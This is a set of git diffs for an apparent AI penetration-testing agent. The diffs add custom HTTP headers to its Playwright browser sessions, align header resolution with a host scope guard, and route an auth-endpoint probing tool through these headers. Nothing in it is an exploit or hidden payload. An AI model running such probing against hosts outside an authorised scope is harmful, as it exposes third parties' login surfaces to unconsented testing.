   getAllowedHosts,
   isHostAllowed,
+  resolverSessionFromCtx,
   ScopeViolationError,
 } from "./scopeGuard";
 export { spawnCodingAgent } from "./spawnCodingAgent";

--- a/src/core/agents/offSecAgent/tools/playwrightMcp.test.ts
+++ b/src/core/agents/offSecAgent/tools/playwrightMcp.test.ts
@@ -180,22 +180,22 @@ describe("PlaywrightMcpSession — constructor defaults", () => {
   });
 
   it("uses explicit values when provided", () => {
-    const session = new PlaywrightMcpSession(
-      false,
-      "MyAgent/1.0",
-      "800,600",
-    ) as unknown as InternalShape;
+    const session = new PlaywrightMcpSession({
+      headless: false,
+      userAgent: "MyAgent/1.0",
+      viewportSize: "800,600",
+    }) as unknown as InternalShape;
     expect(session.headless).toBe(false);
     expect(session.userAgent).toBe("MyAgent/1.0");
     expect(session.viewportSize).toBe("800,600");
   });
 
   it("treats explicit null as 'opt out of the default' (let Chromium pick its built-in)", () => {
-    const session = new PlaywrightMcpSession(
-      true,
-      null,
-      null,
-    ) as unknown as InternalShape;
+    const session = new PlaywrightMcpSession({
+      headless: true,
+      userAgent: null,
+      viewportSize: null,
+    }) as unknown as InternalShape;
     expect(session.userAgent).toBeUndefined();
     expect(session.viewportSize).toBeUndefined();
   });

--- a/src/core/agents/offSecAgent/tools/playwrightMcp.ts
+++ b/src/core/agents/offSecAgent/tools/playwrightMcp.ts
@@ -507,7 +507,10 @@ export class PlaywrightMcpSession {
             os.tmpdir(),
             `pensar-mcp-${process.pid}-${Date.now()}.json`,
           );
-          await fsp.writeFile(this.mcpConfigPath, JSON.stringify(cfg), "utf-8");
+          await fsp.writeFile(this.mcpConfigPath, JSON.stringify(cfg), {
+            encoding: "utf-8",
+            mode: 0o600,
+          });
           args.push("--config", this.mcpConfigPath);
         }
 

--- a/src/core/agents/offSecAgent/tools/playwrightMcp.ts
+++ b/src/core/agents/offSecAgent/tools/playwrightMcp.ts
@@ -338,6 +338,20 @@ export function setViewportSize(viewportSize: string | undefined): void {
 }
 
 /**
+ * Construction-time options for {@link PlaywrightMcpSession}. Using an
+ * options object instead of positional args keeps call sites readable
+ * when only one field (e.g. `extraHttpHeaders`) is being overridden and
+ * makes the constructor safe to extend without silently breaking
+ * existing callers.
+ */
+export interface PlaywrightMcpSessionOptions {
+  readonly headless?: boolean;
+  readonly userAgent?: string | null;
+  readonly viewportSize?: string | null;
+  readonly extraHttpHeaders?: Record<string, string> | null;
+}
+
+/**
  * Isolated MCP browser session.
  *
  * Each instance owns its own Playwright MCP child-process and browser.
@@ -364,31 +378,29 @@ export class PlaywrightMcpSession {
   /**
    * Construct a new isolated browser session.
    *
-   * Each parameter has three-state semantics:
-   * - `undefined` (omitted) → fall back to the module-level default
+   * Each option has three-state semantics:
+   * - omitted / `undefined` → fall back to the module-level default
    *   (`defaultHeadless` / `defaultUserAgent` / `defaultViewportSize`,
    *   configurable via {@link setHeadlessMode}, {@link setUserAgent}, and
    *   {@link setViewportSize}). For viewport this means **1920x1080** by
-   *   default — sessions constructed with no args will launch Chromium at
+   *   default — sessions constructed with no opts will launch Chromium at
    *   a real desktop resolution, not the tiny built-in default.
    * - explicit `string` / `boolean` value → use it as-is.
-   * - explicit `null` (for `userAgent` / `viewportSize`) → opt OUT of the
-   *   default and let Chromium use its built-in value (useful when the
-   *   anti-bot UA / 1920x1080 are counter-productive for a target).
+   * - explicit `null` (for `userAgent` / `viewportSize` /
+   *   `extraHttpHeaders`) → opt OUT of the default and let Chromium use
+   *   its built-in value (useful when the anti-bot UA / 1920x1080 are
+   *   counter-productive for a target).
    *
-   * Viewport has an additional hard floor: if neither the arg nor the
+   * Viewport has an additional hard floor: if neither the option nor the
    * module default is set (e.g. someone called
    * `setViewportSize(undefined)`), the constructor still falls back to
    * {@link HARDCODED_VIEWPORT_FALLBACK} (`"1920,1080"`) so we never
    * silently launch Chromium at its tiny built-in viewport. The only way
    * to opt out is to pass `null` explicitly.
    */
-  constructor(
-    headless?: boolean,
-    userAgent?: string | null,
-    viewportSize?: string | null,
-    extraHttpHeaders?: Record<string, string> | null,
-  ) {
+  constructor(options: PlaywrightMcpSessionOptions = {}) {
+    const { headless, userAgent, viewportSize, extraHttpHeaders } = options;
+
     this.headless = headless ?? defaultHeadless;
     this.userAgent =
       userAgent === null ? undefined : (userAgent ?? defaultUserAgent);
@@ -1017,13 +1029,13 @@ export function createBrowserTools(
   } else {
     // PlaywrightMcpSession's constructor folds in the module-level
     // defaults (1920x1080 viewport, desktop Chrome UA, headless=true)
-    // when these args are undefined — pass them through verbatim.
-    session = new PlaywrightMcpSession(
+    // when these options are undefined — pass them through verbatim.
+    session = new PlaywrightMcpSession({
       headless,
       userAgent,
       viewportSize,
       extraHttpHeaders,
-    );
+    });
 
     if (abortSignal) {
       const onAbort = () => session.disconnect().catch(() => {});

--- a/src/core/agents/offSecAgent/tools/playwrightMcp.ts
+++ b/src/core/agents/offSecAgent/tools/playwrightMcp.ts
@@ -357,6 +357,9 @@ export class PlaywrightMcpSession {
   private readonly headless: boolean;
   private readonly userAgent: string | undefined;
   private readonly viewportSize: string | undefined;
+  private readonly extraHttpHeaders: Record<string, string> | undefined;
+  /** Temp config file written for MCP launch — deleted on disconnect. */
+  private mcpConfigPath: string | null = null;
 
   /**
    * Construct a new isolated browser session.
@@ -384,6 +387,7 @@ export class PlaywrightMcpSession {
     headless?: boolean,
     userAgent?: string | null,
     viewportSize?: string | null,
+    extraHttpHeaders?: Record<string, string> | null,
   ) {
     this.headless = headless ?? defaultHeadless;
     this.userAgent =
@@ -392,6 +396,17 @@ export class PlaywrightMcpSession {
       viewportSize === null
         ? undefined
         : (viewportSize ?? defaultViewportSize ?? HARDCODED_VIEWPORT_FALLBACK);
+
+    // Snapshot the headers at construction so subsequent mutations to
+    // the caller's record don't leak into this already-launched session
+    // (INV-browser-snapshot). The caller is responsible for resolving
+    // effective headers (session/global/credential) before passing.
+    const headerSource =
+      extraHttpHeaders === null ? undefined : extraHttpHeaders;
+    this.extraHttpHeaders =
+      headerSource && Object.keys(headerSource).length > 0
+        ? { ...headerSource }
+        : undefined;
   }
 
   /** Immediately reset all instance state. Synchronous — no I/O. */
@@ -463,6 +478,25 @@ export class PlaywrightMcpSession {
 
         if (this.viewportSize) {
           args.push(`--viewport-size=${this.viewportSize}`);
+        }
+
+        // INV-browser-snapshot: write a temporary @playwright/mcp config
+        // file with `browser.contextOptions.extraHTTPHeaders` so every
+        // Chromium request includes the session's custom headers.
+        if (this.extraHttpHeaders) {
+          const os = await import("os");
+          const fsp = await import("fs/promises");
+          const cfg = {
+            browser: {
+              contextOptions: { extraHTTPHeaders: this.extraHttpHeaders },
+            },
+          };
+          this.mcpConfigPath = join(
+            os.tmpdir(),
+            `pensar-mcp-${process.pid}-${Date.now()}.json`,
+          );
+          await fsp.writeFile(this.mcpConfigPath, JSON.stringify(cfg), "utf-8");
+          args.push("--config", this.mcpConfigPath);
         }
 
         // Disable Chromium sandbox when running as root (e.g., in Docker/ECS containers).
@@ -553,6 +587,21 @@ export class PlaywrightMcpSession {
     }
 
     this.forceKillProcess();
+
+    // Clean up the temp MCP config file (if any).
+    if (this.mcpConfigPath) {
+      const configPath = this.mcpConfigPath;
+      this.mcpConfigPath = null;
+      void (async () => {
+        try {
+          const fsp = await import("fs/promises");
+          await fsp.unlink(configPath);
+        } catch {
+          // Best-effort cleanup — already-deleted is fine.
+        }
+      })();
+    }
+
     this.disconnecting = false;
   }
 
@@ -956,6 +1005,7 @@ export function createBrowserTools(
   userAgent?: string | null,
   viewportSize?: string | null,
   existingSession?: PlaywrightMcpSession,
+  extraHttpHeaders?: Record<string, string> | null,
 ) {
   let session: PlaywrightMcpSession;
 
@@ -968,7 +1018,12 @@ export function createBrowserTools(
     // PlaywrightMcpSession's constructor folds in the module-level
     // defaults (1920x1080 viewport, desktop Chrome UA, headless=true)
     // when these args are undefined — pass them through verbatim.
-    session = new PlaywrightMcpSession(headless, userAgent, viewportSize);
+    session = new PlaywrightMcpSession(
+      headless,
+      userAgent,
+      viewportSize,
+      extraHttpHeaders,
+    );
 
     if (abortSignal) {
       const onAbort = () => session.disconnect().catch(() => {});

--- a/src/core/agents/offSecAgent/tools/playwrightMcp.ts
+++ b/src/core/agents/offSecAgent/tools/playwrightMcp.ts
@@ -337,13 +337,6 @@ export function setViewportSize(viewportSize: string | undefined): void {
   defaultViewportSize = viewportSize;
 }
 
-/**
- * Construction-time options for {@link PlaywrightMcpSession}. Using an
- * options object instead of positional args keeps call sites readable
- * when only one field (e.g. `extraHttpHeaders`) is being overridden and
- * makes the constructor safe to extend without silently breaking
- * existing callers.
- */
 export interface PlaywrightMcpSessionOptions {
   readonly headless?: boolean;
   readonly userAgent?: string | null;
@@ -376,27 +369,9 @@ export class PlaywrightMcpSession {
   private mcpConfigPath: string | null = null;
 
   /**
-   * Construct a new isolated browser session.
-   *
-   * Each option has three-state semantics:
-   * - omitted / `undefined` → fall back to the module-level default
-   *   (`defaultHeadless` / `defaultUserAgent` / `defaultViewportSize`,
-   *   configurable via {@link setHeadlessMode}, {@link setUserAgent}, and
-   *   {@link setViewportSize}). For viewport this means **1920x1080** by
-   *   default — sessions constructed with no opts will launch Chromium at
-   *   a real desktop resolution, not the tiny built-in default.
-   * - explicit `string` / `boolean` value → use it as-is.
-   * - explicit `null` (for `userAgent` / `viewportSize` /
-   *   `extraHttpHeaders`) → opt OUT of the default and let Chromium use
-   *   its built-in value (useful when the anti-bot UA / 1920x1080 are
-   *   counter-productive for a target).
-   *
-   * Viewport has an additional hard floor: if neither the option nor the
-   * module default is set (e.g. someone called
-   * `setViewportSize(undefined)`), the constructor still falls back to
-   * {@link HARDCODED_VIEWPORT_FALLBACK} (`"1920,1080"`) so we never
-   * silently launch Chromium at its tiny built-in viewport. The only way
-   * to opt out is to pass `null` explicitly.
+   * Each option is three-state: `undefined` → module default, value → use it,
+   * `null` → opt out of the default and let Chromium pick. Viewport has a
+   * hard floor of `HARDCODED_VIEWPORT_FALLBACK` to avoid Chromium's tiny built-in.
    */
   constructor(options: PlaywrightMcpSessionOptions = {}) {
     const { headless, userAgent, viewportSize, extraHttpHeaders } = options;
@@ -409,10 +384,7 @@ export class PlaywrightMcpSession {
         ? undefined
         : (viewportSize ?? defaultViewportSize ?? HARDCODED_VIEWPORT_FALLBACK);
 
-    // Snapshot the headers at construction so subsequent mutations to
-    // the caller's record don't leak into this already-launched session
-    // (INV-browser-snapshot). The caller is responsible for resolving
-    // effective headers (session/global/credential) before passing.
+    // Snapshot headers so post-construction mutations don't leak in.
     const headerSource =
       extraHttpHeaders === null ? undefined : extraHttpHeaders;
     this.extraHttpHeaders =
@@ -492,9 +464,8 @@ export class PlaywrightMcpSession {
           args.push(`--viewport-size=${this.viewportSize}`);
         }
 
-        // INV-browser-snapshot: write a temporary @playwright/mcp config
-        // file with `browser.contextOptions.extraHTTPHeaders` so every
-        // Chromium request includes the session's custom headers.
+        // Pass extraHTTPHeaders via a temp @playwright/mcp config file
+        // so every Chromium request includes them.
         if (this.extraHttpHeaders) {
           const os = await import("os");
           const fsp = await import("fs/promises");
@@ -603,7 +574,6 @@ export class PlaywrightMcpSession {
 
     this.forceKillProcess();
 
-    // Clean up the temp MCP config file (if any).
     if (this.mcpConfigPath) {
       const configPath = this.mcpConfigPath;
       this.mcpConfigPath = null;
@@ -612,7 +582,7 @@ export class PlaywrightMcpSession {
           const fsp = await import("fs/promises");
           await fsp.unlink(configPath);
         } catch {
-          // Best-effort cleanup — already-deleted is fine.
+          // best-effort; already-deleted is fine
         }
       })();
     }

--- a/src/core/agents/offSecAgent/tools/probeAuthEndpoints.ts
+++ b/src/core/agents/offSecAgent/tools/probeAuthEndpoints.ts
@@ -1,7 +1,11 @@
 import { tool } from "ai";
 import { z } from "zod";
 import { targetFetch } from "../../../http/targetHeaders";
-import { assertUrlInScope, ScopeViolationError } from "./scopeGuard";
+import {
+  assertUrlInScope,
+  resolverSessionFromCtx,
+  ScopeViolationError,
+} from "./scopeGuard";
 import type { ToolContext } from "./types";
 
 const AUTH_ENDPOINT_PATTERNS = {
@@ -143,10 +147,14 @@ Returns discovered endpoints and recommended login approach.`,
 
         // Try GET
         try {
-          const getResult = await targetFetch(ctx.session, url, {
-            method: "GET",
-            signal: ctx.abortSignal,
-          });
+          const getResult = await targetFetch(
+            resolverSessionFromCtx(ctx),
+            url,
+            {
+              method: "GET",
+              signal: ctx.abortSignal,
+            },
+          );
           if (getResult.status !== 404 && getResult.status !== 0) {
             methods.push("GET");
             if (getResult.status === 401)
@@ -170,12 +178,16 @@ Returns discovered endpoints and recommended login approach.`,
 
         // Try POST with empty JSON
         try {
-          const postResult = await targetFetch(ctx.session, url, {
-            method: "POST",
-            headers: { "Content-Type": "application/json" },
-            body: "{}",
-            signal: ctx.abortSignal,
-          });
+          const postResult = await targetFetch(
+            resolverSessionFromCtx(ctx),
+            url,
+            {
+              method: "POST",
+              headers: { "Content-Type": "application/json" },
+              body: "{}",
+              signal: ctx.abortSignal,
+            },
+          );
           if (postResult.status !== 404 && postResult.status !== 0) {
             methods.push("POST");
             const body = await postResult.text();

--- a/src/core/agents/offSecAgent/tools/probeAuthEndpoints.ts
+++ b/src/core/agents/offSecAgent/tools/probeAuthEndpoints.ts
@@ -1,5 +1,6 @@
 import { tool } from "ai";
 import { z } from "zod";
+import { targetFetch } from "../../../http/targetHeaders";
 import { assertUrlInScope, ScopeViolationError } from "./scopeGuard";
 import type { ToolContext } from "./types";
 
@@ -142,7 +143,7 @@ Returns discovered endpoints and recommended login approach.`,
 
         // Try GET
         try {
-          const getResult = await fetch(url, {
+          const getResult = await targetFetch(ctx.session, url, {
             method: "GET",
             signal: ctx.abortSignal,
           });
@@ -169,7 +170,7 @@ Returns discovered endpoints and recommended login approach.`,
 
         // Try POST with empty JSON
         try {
-          const postResult = await fetch(url, {
+          const postResult = await targetFetch(ctx.session, url, {
             method: "POST",
             headers: { "Content-Type": "application/json" },
             body: "{}",

--- a/src/core/agents/offSecAgent/tools/sandboxPlaywright.ts
+++ b/src/core/agents/offSecAgent/tools/sandboxPlaywright.ts
@@ -30,7 +30,10 @@ import type {
   BrowserNavigateResult,
   BrowserScreenshotResult,
 } from "./playwrightMcp";
-import { resolveEffectiveHeaders } from "../../../http/targetHeaders";
+import {
+  resolveEffectiveHeaders,
+  stripBrowserManagedHeaders,
+} from "../../../http/targetHeaders";
 import type { SandboxExecutionResult, UnifiedSandbox } from "./sandbox";
 import { resolverSessionFromCtx } from "./scopeGuard";
 import type { ToolContext } from "./types";
@@ -455,7 +458,12 @@ export function createSandboxBrowserTools(ctx: ToolContext) {
     const resolved = targetUrl
       ? resolveEffectiveHeaders(resolverSessionFromCtx(ctx), targetUrl)
       : ctx.session.config?.headers;
-    return runPlaywrightScript(sandbox, body, timeout, resolved);
+    return runPlaywrightScript(
+      sandbox,
+      body,
+      timeout,
+      stripBrowserManagedHeaders(resolved),
+    );
   }
 
   // ------- browser_navigate -------------------------------------------------

--- a/src/core/agents/offSecAgent/tools/sandboxPlaywright.ts
+++ b/src/core/agents/offSecAgent/tools/sandboxPlaywright.ts
@@ -229,7 +229,12 @@ async function runPlaywrightScript(
   sandbox: UnifiedSandbox,
   body: string,
   timeout = 60,
+  extraHttpHeaders?: Record<string, string>,
 ): Promise<unknown> {
+  const headersJson =
+    extraHttpHeaders && Object.keys(extraHttpHeaders).length > 0
+      ? JSON.stringify(extraHttpHeaders)
+      : "null";
   const script = `
 const { chromium } = require('playwright');
 const fs = require('fs');
@@ -245,6 +250,12 @@ const fs = require('fs');
     try { fs.accessSync(p, fs.constants.X_OK); executablePath = p; break; } catch {}
   }
 
+  // INV-browser-snapshot (sandbox): every Chromium request carries the
+  // session's configured custom HTTP headers. Resolved fresh on each
+  // script invocation so mutations via /headers take effect on the
+  // next browser tool call.
+  const __extraHeaders = ${headersJson};
+
   let context;
   const __consoleMessages = [];
   try {
@@ -252,6 +263,7 @@ const fs = require('fs');
       headless: true,
       ...(executablePath ? { executablePath } : {}),
       args: ['--no-sandbox', '--disable-setuid-sandbox', '--disable-dev-shm-usage', '--disable-gpu'],
+      ...(__extraHeaders ? { extraHTTPHeaders: __extraHeaders } : {}),
     });
     const pages = context.pages();
     const page = pages.length > 0 ? pages[pages.length - 1] : await context.newPage();
@@ -434,6 +446,19 @@ export function createSandboxBrowserTools(ctx: ToolContext) {
     return setupPromise;
   }
 
+  // Resolve session headers fresh on every browser tool call so /headers
+  // mutations take effect on the next invocation (INV-browser-snapshot
+  // for the sandbox path — a fresh persistent context launches per
+  // script call, so we don't have the MCP-style snapshot lock-in).
+  function runScript(body: string, timeout = 60): Promise<unknown> {
+    return runPlaywrightScript(
+      sandbox,
+      body,
+      timeout,
+      ctx.session.config?.headers,
+    );
+  }
+
   // ------- browser_navigate -------------------------------------------------
 
   const browser_navigate = tool({
@@ -447,8 +472,7 @@ Target base URL: ${targetUrl}`,
     execute: async ({ url }): Promise<BrowserNavigateResult> => {
       try {
         await setup();
-        const result = (await runPlaywrightScript(
-          sandbox,
+        const result = (await runScript(
           `
     await page.goto(${JSON.stringify(url)}, { waitUntil: 'domcontentloaded', timeout: 30000 });
     // Persist current URL so subsequent tool calls can restore the page
@@ -485,8 +509,7 @@ Use this to document:
         const screenshotFilename = `${filename}_${timestamp}.png`;
         const sandboxPath = `${SANDBOX_EVIDENCE_DIR}/${screenshotFilename}`;
 
-        const result = (await runPlaywrightScript(
-          sandbox,
+        const result = (await runScript(
           `
     const buf = await page.screenshot({ fullPage: false });
     const b64 = buf.toString('base64');
@@ -545,8 +568,7 @@ Example workflow:
     }> => {
       try {
         await setup();
-        const result = (await runPlaywrightScript(
-          sandbox,
+        const result = (await runScript(
           `
     // Build accessibility snapshot via page.evaluate — works on all
     // Playwright versions and doesn't depend on the deprecated
@@ -661,8 +683,7 @@ IMPORTANT: For reliable clicking, first call browser_snapshot to get element ref
     execute: async ({ element, ref }): Promise<BrowserClickResult> => {
       try {
         await setup();
-        const result = (await runPlaywrightScript(
-          sandbox,
+        const result = (await runScript(
           `
     const ref = ${JSON.stringify(ref || "")};
     const element = ${JSON.stringify(element)};
@@ -739,8 +760,7 @@ IMPORTANT: For reliable form filling, first call browser_snapshot to get element
     execute: async ({ element, ref, value }): Promise<BrowserFillResult> => {
       try {
         await setup();
-        const result = (await runPlaywrightScript(
-          sandbox,
+        const result = (await runScript(
           `
     const ref = ${JSON.stringify(ref || "")};
     const element = ${JSON.stringify(element)};
@@ -828,8 +848,7 @@ The JavaScript is executed in the page context and the result is returned.`,
           /^\s*(async\s+)?function\s*\(/.test(script);
         const fnScript = isFunction ? script : `() => (${script})`;
 
-        const result = (await runPlaywrightScript(
-          sandbox,
+        const result = (await runScript(
           `
     const fnStr = ${JSON.stringify(fnScript)};
     const fn = new Function('return (' + fnStr + ')')();
@@ -862,8 +881,7 @@ Use this to check for:
     execute: async (): Promise<BrowserConsoleResult> => {
       try {
         await setup();
-        const result = (await runPlaywrightScript(
-          sandbox,
+        const result = (await runScript(
           `
     const fs = require('fs');
     let persisted = [];
@@ -915,8 +933,7 @@ The returned cookies can be formatted as a Cookie header for use with http_reque
     }> => {
       try {
         await setup();
-        const result = (await runPlaywrightScript(
-          sandbox,
+        const result = (await runScript(
           `
     const urls = ${JSON.stringify(urls || [])};
     const cookies = urls.length > 0

--- a/src/core/agents/offSecAgent/tools/sandboxPlaywright.ts
+++ b/src/core/agents/offSecAgent/tools/sandboxPlaywright.ts
@@ -231,14 +231,10 @@ async function runPlaywrightScript(
   timeout = 60,
   extraHttpHeaders?: Record<string, string>,
 ): Promise<unknown> {
-  const headersJsonRaw =
+  const headersJson =
     extraHttpHeaders && Object.keys(extraHttpHeaders).length > 0
       ? JSON.stringify(extraHttpHeaders)
       : "null";
-  const headersJson = headersJsonRaw
-    .replace(/\\/g, "\\\\")
-    .replace(/`/g, "\\`")
-    .replace(/\$\{/g, "\\${");
   const script = `
 const { chromium } = require('playwright');
 const fs = require('fs');

--- a/src/core/agents/offSecAgent/tools/sandboxPlaywright.ts
+++ b/src/core/agents/offSecAgent/tools/sandboxPlaywright.ts
@@ -22,6 +22,10 @@ import { tool } from "ai";
 import { existsSync, mkdirSync, writeFileSync } from "fs";
 import { dirname, join } from "path";
 import { z } from "zod";
+import {
+  resolveEffectiveHeaders,
+  stripBrowserManagedHeaders,
+} from "../../../http/targetHeaders";
 import type {
   BrowserClickResult,
   BrowserConsoleResult,
@@ -30,10 +34,6 @@ import type {
   BrowserNavigateResult,
   BrowserScreenshotResult,
 } from "./playwrightMcp";
-import {
-  resolveEffectiveHeaders,
-  stripBrowserManagedHeaders,
-} from "../../../http/targetHeaders";
 import type { SandboxExecutionResult, UnifiedSandbox } from "./sandbox";
 import { resolverSessionFromCtx } from "./scopeGuard";
 import type { ToolContext } from "./types";

--- a/src/core/agents/offSecAgent/tools/sandboxPlaywright.ts
+++ b/src/core/agents/offSecAgent/tools/sandboxPlaywright.ts
@@ -255,10 +255,8 @@ const fs = require('fs');
     try { fs.accessSync(p, fs.constants.X_OK); executablePath = p; break; } catch {}
   }
 
-  // INV-browser-snapshot (sandbox): every Chromium request carries the
-  // session's configured custom HTTP headers. Resolved fresh on each
-  // script invocation so mutations via /headers take effect on the
-  // next browser tool call.
+  // Resolved per script invocation so /headers mutations take effect
+  // on the next browser tool call.
   const __extraHeaders = ${headersJson};
 
   let context;
@@ -451,9 +449,7 @@ export function createSandboxBrowserTools(ctx: ToolContext) {
     return setupPromise;
   }
 
-  // Resolve session + credential headers fresh on every browser tool
-  // call so /headers mutations take effect on the next invocation
-  // (INV-browser-snapshot, INV-single-source for the sandbox path).
+  // Resolve fresh on every tool call so /headers mutations apply next call.
   function runScript(body: string, timeout = 60): Promise<unknown> {
     const resolved = targetUrl
       ? resolveEffectiveHeaders(resolverSessionFromCtx(ctx), targetUrl)

--- a/src/core/agents/offSecAgent/tools/sandboxPlaywright.ts
+++ b/src/core/agents/offSecAgent/tools/sandboxPlaywright.ts
@@ -30,7 +30,9 @@ import type {
   BrowserNavigateResult,
   BrowserScreenshotResult,
 } from "./playwrightMcp";
+import { resolveEffectiveHeaders } from "../../../http/targetHeaders";
 import type { SandboxExecutionResult, UnifiedSandbox } from "./sandbox";
+import { resolverSessionFromCtx } from "./scopeGuard";
 import type { ToolContext } from "./types";
 
 // ---------------------------------------------------------------------------
@@ -446,17 +448,14 @@ export function createSandboxBrowserTools(ctx: ToolContext) {
     return setupPromise;
   }
 
-  // Resolve session headers fresh on every browser tool call so /headers
-  // mutations take effect on the next invocation (INV-browser-snapshot
-  // for the sandbox path — a fresh persistent context launches per
-  // script call, so we don't have the MCP-style snapshot lock-in).
+  // Resolve session + credential headers fresh on every browser tool
+  // call so /headers mutations take effect on the next invocation
+  // (INV-browser-snapshot, INV-single-source for the sandbox path).
   function runScript(body: string, timeout = 60): Promise<unknown> {
-    return runPlaywrightScript(
-      sandbox,
-      body,
-      timeout,
-      ctx.session.config?.headers,
-    );
+    const resolved = targetUrl
+      ? resolveEffectiveHeaders(resolverSessionFromCtx(ctx), targetUrl)
+      : ctx.session.config?.headers;
+    return runPlaywrightScript(sandbox, body, timeout, resolved);
   }
 
   // ------- browser_navigate -------------------------------------------------

--- a/src/core/agents/offSecAgent/tools/sandboxPlaywright.ts
+++ b/src/core/agents/offSecAgent/tools/sandboxPlaywright.ts
@@ -231,10 +231,14 @@ async function runPlaywrightScript(
   timeout = 60,
   extraHttpHeaders?: Record<string, string>,
 ): Promise<unknown> {
-  const headersJson =
+  const headersJsonRaw =
     extraHttpHeaders && Object.keys(extraHttpHeaders).length > 0
       ? JSON.stringify(extraHttpHeaders)
       : "null";
+  const headersJson = headersJsonRaw
+    .replace(/\\/g, "\\\\")
+    .replace(/`/g, "\\`")
+    .replace(/\$\{/g, "\\${");
   const script = `
 const { chromium } = require('playwright');
 const fs = require('fs');

--- a/src/core/agents/offSecAgent/tools/scopeGuard.test.ts
+++ b/src/core/agents/offSecAgent/tools/scopeGuard.test.ts
@@ -1,4 +1,5 @@
 import { describe, expect, it } from "vitest";
+import { applyHeadersToShellCommand } from "../../../http/targetHeaders";
 import type { SessionInfo } from "../../../session";
 import {
   assertCommandInScope,
@@ -8,6 +9,7 @@ import {
   getAllowedHosts,
   getRegistrableDomain,
   isHostAllowed,
+  resolverSessionFromCtx,
   ScopeViolationError,
 } from "./scopeGuard";
 import type { ToolContext } from "./types";
@@ -112,6 +114,68 @@ describe("getAllowedHosts", () => {
     };
     const hosts = getAllowedHosts(ctx);
     expect(hosts).toEqual(["api.example.com"]);
+  });
+});
+
+// ---------------------------------------------------------------------------
+// resolverSessionFromCtx — bridges ctx.target into the header resolver's
+// scope view so scopeGuard and applyHeadersToShellCommand never diverge.
+// ---------------------------------------------------------------------------
+
+describe("resolverSessionFromCtx", () => {
+  it("returns the bare session when ctx.target is absent", () => {
+    const ctx = makeCtx();
+    expect(resolverSessionFromCtx(ctx)).toBe(ctx.session);
+  });
+
+  it("returns the bare session when ctx.target is already in session.targets", () => {
+    const ctx = makeCtx({ target: "https://example.com" });
+    ctx.session = {
+      ...ctx.session,
+      targets: ["https://example.com"],
+    } as typeof ctx.session;
+    expect(resolverSessionFromCtx(ctx)).toBe(ctx.session);
+  });
+
+  it("appends ctx.target to targets when it is not in session.targets", () => {
+    const ctx = makeCtx({ target: "https://other.example" });
+    ctx.session = {
+      ...ctx.session,
+      targets: ["https://example.com"],
+    } as typeof ctx.session;
+    const out = resolverSessionFromCtx(ctx);
+    expect(out.targets).toEqual([
+      "https://example.com",
+      "https://other.example",
+    ]);
+  });
+
+  it("makes applyHeadersToShellCommand respect ctx.target when session.targets does not include it", () => {
+    // Regression: scopeGuard accepts a host via ctx.target, but the
+    // header resolver only saw session.targets — so it silently
+    // classified the host as out-of-scope and dropped configured
+    // headers (cursor bugbot finding, INV-single-source).
+    const ctx = makeCtx({ target: "https://other.example" });
+    ctx.session = {
+      ...ctx.session,
+      targets: ["https://example.com"],
+      config: { headers: { "X-API-Key": "abc" } },
+    } as typeof ctx.session;
+
+    const direct = applyHeadersToShellCommand(
+      "curl https://other.example/",
+      ctx.session,
+      ["other.example"],
+    );
+    expect(direct.status).toBe("no-headers");
+
+    const bridged = applyHeadersToShellCommand(
+      "curl https://other.example/",
+      resolverSessionFromCtx(ctx),
+      ["other.example"],
+    );
+    expect(bridged.status).toBe("injected");
+    expect(bridged.command).toContain(`-H "X-API-Key: abc"`);
   });
 });
 

--- a/src/core/agents/offSecAgent/tools/scopeGuard.test.ts
+++ b/src/core/agents/offSecAgent/tools/scopeGuard.test.ts
@@ -118,8 +118,7 @@ describe("getAllowedHosts", () => {
 });
 
 // ---------------------------------------------------------------------------
-// resolverSessionFromCtx — bridges ctx.target into the header resolver's
-// scope view so scopeGuard and applyHeadersToShellCommand never diverge.
+// resolverSessionFromCtx
 // ---------------------------------------------------------------------------
 
 describe("resolverSessionFromCtx", () => {
@@ -151,10 +150,8 @@ describe("resolverSessionFromCtx", () => {
   });
 
   it("makes applyHeadersToShellCommand respect ctx.target when session.targets does not include it", () => {
-    // Regression: scopeGuard accepts a host via ctx.target, but the
-    // header resolver only saw session.targets — so it silently
-    // classified the host as out-of-scope and dropped configured
-    // headers (cursor bugbot finding, INV-single-source).
+    // Regression: resolver saw only session.targets and dropped headers
+    // for hosts approved via ctx.target.
     const ctx = makeCtx({ target: "https://other.example" });
     ctx.session = {
       ...ctx.session,

--- a/src/core/agents/offSecAgent/tools/scopeGuard.ts
+++ b/src/core/agents/offSecAgent/tools/scopeGuard.ts
@@ -54,21 +54,9 @@ export class ScopeViolationError extends Error {
   }
 }
 
-/**
- * Build a `ResolverSession` that the `src/core/http/` resolver can use
- * without diverging from scopeGuard's scope view.
- *
- * The resolver only reads `session.targets` and
- * `session.config.scopeConstraints.allowedHosts`; it has no awareness of
- * `ctx.target`. When a tool ctx carries a `target` that isn't already in
- * `session.targets` (e.g. sub-agents like findingJudge / documentFinding
- * that pass `ctx.target` through to a spawned agent), the resolver would
- * silently classify that host as out-of-scope and drop configured
- * headers — even though scopeGuard had just approved the command.
- *
- * Folding `ctx.target` into the resolver's `targets` view here makes the
- * two scope checks come from a single source of truth.
- */
+// Fold `ctx.target` into the resolver's `targets` view so sub-agent
+// commands (where `ctx.target` isn't in `session.targets`) don't get
+// classified as out-of-scope and silently dropped from header resolution.
 export function resolverSessionFromCtx(ctx: ToolContext): ResolverSession {
   if (!ctx.target) return ctx.session;
   const existing = ctx.session.targets ?? [];

--- a/src/core/agents/offSecAgent/tools/scopeGuard.ts
+++ b/src/core/agents/offSecAgent/tools/scopeGuard.ts
@@ -27,6 +27,7 @@
 
 import { getDomain } from "tldts";
 import { parseTargetUrl } from "../../../../util/url";
+import type { ResolverSession } from "../../../http/targetHeaders";
 import type { ToolContext } from "./types";
 
 /**
@@ -51,6 +52,31 @@ export class ScopeViolationError extends Error {
     );
     this.name = "ScopeViolationError";
   }
+}
+
+/**
+ * Build a `ResolverSession` that the `src/core/http/` resolver can use
+ * without diverging from scopeGuard's scope view.
+ *
+ * The resolver only reads `session.targets` and
+ * `session.config.scopeConstraints.allowedHosts`; it has no awareness of
+ * `ctx.target`. When a tool ctx carries a `target` that isn't already in
+ * `session.targets` (e.g. sub-agents like findingJudge / documentFinding
+ * that pass `ctx.target` through to a spawned agent), the resolver would
+ * silently classify that host as out-of-scope and drop configured
+ * headers — even though scopeGuard had just approved the command.
+ *
+ * Folding `ctx.target` into the resolver's `targets` view here makes the
+ * two scope checks come from a single source of truth.
+ */
+export function resolverSessionFromCtx(ctx: ToolContext): ResolverSession {
+  if (!ctx.target) return ctx.session;
+  const existing = ctx.session.targets ?? [];
